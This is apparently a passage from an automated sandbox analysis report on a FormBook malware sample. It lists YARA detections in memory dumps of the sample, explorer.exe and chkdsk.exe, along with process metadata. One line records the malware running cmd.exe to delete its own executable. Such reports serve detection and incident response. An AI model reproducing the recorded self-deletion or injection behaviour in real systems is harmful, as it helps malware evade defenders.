                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Target ID:5
                                                    Start time:20:58:37
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff720ea0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    Target ID:10
                                                    Start time:20:59:02
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                    Imagebase:0x90000
                                                    File size:23040 bytes
                                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Target ID:13
                                                    Start time:20:59:09
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0xd80000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:14
                                                    Start time:20:59:11
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7f20f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    No disassembly